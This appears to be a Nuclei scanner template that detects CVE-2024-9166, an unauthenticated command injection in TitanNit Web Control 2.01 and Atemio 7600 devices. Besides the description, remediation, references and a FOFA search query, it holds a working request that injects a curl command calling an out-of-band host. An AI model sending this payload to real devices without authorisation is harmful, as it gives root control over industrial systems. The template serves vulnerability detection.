CVE-2024-9166: TitanNit Web Control 2.01/Atemio 7600 - Remote Code Execution

id: CVE-2024-9166

info:
  name: TitanNit Web Control 2.01/Atemio 7600 - Remote Code Execution
  author: DhiyaneshDk
  severity: critical
  description: |
    The device contains a command injection caused by the 'getcommand' query in the application, letting unauthorized attackers execute system commands with root privileges, exploit requires attacker to send crafted requests.
  impact: |
    Unauthenticated attackers can execute arbitrary system commands with root privileges through command injection in the getcommand query parameter, achieving complete control of the TitanNit Web Control device and potentially pivoting to connected industrial control systems.
  remediation: |
    Apply security patches from TitanNit for Web Control 2.01 and Atemio 7600 to address the command injection vulnerability in the getcommand query parameter.
  reference:
    - https://www.cisa.gov/news-events/ics-advisories/icsa-24-270-03
    - https://www.exploit-db.com/exploits/51853
    - https://github.com/Andrysqui/CVE-2024-9166
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5801.php
  classification:
    cve-id: CVE-2024-9166
    cwe-id: CWE-78
    epss-score: 0.04578
    epss-percentile: 0.8887
  metadata:
    verified: true
    max-request: 1
    fofa-query: title="TitanNit Web Control"
  tags: cve,cve2024,titanit,web-control,oast,rce,ics,vuln

http:
  - raw:
      - |
        @timeout: 20s
        GET /query?getcommand=&cmd=curl+http://{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: word
        part: body
        words:
          - "titan.css"
# digest: 4a0a00473045022100ff344d4fa665670af73f564fed7d24aae96de72b12c8317a6dff041b0ef0bb4602204ab469ab5aada2001206b3dc58fa7733974c3d67cd48698964440ff9a96310ac:922c64590222798bb761d5b6d8e72950